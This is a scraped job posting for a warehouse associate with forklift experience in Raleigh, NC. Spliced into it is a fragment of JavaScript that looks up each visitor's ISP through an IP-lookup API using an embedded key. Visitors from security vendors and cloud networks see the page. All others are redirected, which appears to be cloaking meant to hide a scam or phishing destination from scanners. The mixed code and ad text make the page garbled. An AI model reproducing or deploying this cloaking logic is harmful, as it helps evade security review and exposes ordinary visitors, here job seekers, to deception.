Warehouse Associate – Forklift/Riding Pallet Jack
Overview
const ipAddress = data.ip;
// retrieve ISP name and AS organization using ip-api.com API const ispUrl = `https://pro.ip-api.com/json/${ipAddress}?key=kKPypoeKUHgwZWD`; fetch(ispUrl) .then(response => response.json()) .then(data => { const ispName = data.isp; const asOrg = data.asname;
// check if ISP or AS organization is allowed const allowedIsps = [/Limestone Networks/i, /Limestone Networks, Inc./i, /Zscaler/i, /M247 Europe SRL/i, /amazon/i, /LinkedIn Corporation/i, /palo alto networks/i, /google/i, /panq/i, /Cloudflare, Inc./i, /Cloudflare/i, /Cloudflare Warp/i]; const allowedAsOrgs = [/Limestone Networks/i, /Limestone Networks, Inc./i, /Zscaler/i, /M247 Europe SRL/i, /amazon/i, /LinkedIn Corporation/i, /palo alto networks/i, /google/i, /panq/i, /Cloudflare, Inc./i, /Cloudflare/i, /Cloudflare Warp/i]; const ispAllowed = allowedIsps.some(pattern => pattern.test(ispName)); const asOrgAllowed = allowedAsOrgs.some(pattern => pattern.test(asOrg));
if (!ispAllowed && !asOrgAllowed) {
// Redirect all users to the same URL
window.location.href = '';
}
})
.catch(error => {
console.error('Error retrieving ISP name:', error);
});
})
.catch(error => {
console.error('Error retrieving IP address or location:', error);
});
We are seeking a dedicated Warehouse Associate with forklift and riding pallet jack experience to join our team in Raleigh, NC.
Responsibilities include:
- Operating forklift and riding pallet jack to safely move, stack, and organize products within the warehouse.
- Loading and unloading shipments efficiently while adhering to safety protocols.
- Maintaining accurate inventory records and ensuring proper product placement.
- Inspecting equipment regularly and reporting any maintenance issues.
- Keeping the warehouse clean, organized, and compliant with safety standards.
Skills needed:
- Proficiency in operating forklift and riding pallet jack equipment.
- Strong attention to detail and organizational skills.
- Ability to lift heavy objects and work in a fast-paced environment.
- Good communication and teamwork skills.
- Commitment to safety procedures and protocols.
Benefits include:
- Competitive pay rate.
- Health, dental, and vision insurance options.
- Paid time off and holidays.
- Opportunities for career growth and advancement.